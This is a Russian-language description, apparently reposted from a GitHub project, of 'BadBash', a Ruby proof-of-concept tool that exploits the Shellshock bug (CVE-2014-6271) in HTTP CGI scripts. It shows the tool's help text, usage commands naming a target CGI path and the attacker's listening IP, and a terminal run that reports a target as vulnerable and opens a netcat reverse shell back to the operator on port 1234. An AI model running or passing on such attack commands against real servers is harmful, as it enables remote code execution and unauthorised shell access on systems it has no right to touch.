
CVE-2014-6271 (ShellShock) RCE PoC инструмент
CVE-2014-6271 (ShellShock) RCE PoC инструмент
======= BadBash — это инструмент эксплуатации RCE для CVE-2014-6271. Базовая версия проверяет только HTTP CGI-сайты и предоставляет обратный шелл через netcat на порту 1234.
Разработчик : Andy Yang Версия : 0.1.0 Лицензия : GPLv3
Оригинальный GitHub-проект : https://github.com/RainMak3r/Rainstorm
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - CVE-2014-6271 RCE инструмент от Andy Yang Базовая версия проверяет только HTTP-сайты Базовая версия предоставляет только обратный шелл через netcat на порту 1234
ПРИМЕР ИСПОЛЬЗОВАНИЯ:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI путь Полный путь к CGI-странице
-d, --Destination IP Ваш IP-адрес, который прослушивает входящее соединение
-h, --help Показать справку
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Информация] Проверка уязвимости цели........
[Информация] Это может занять до 10 секунд........
[Информация] Цель уязвима!!!
[Информация] Пожалуйста, используйте NC для прослушивания порта 1234 для обратного шелла..........
[Информация] Эксплуатация для обратного шелла к 172.16.189.1:1234 через netcat ..........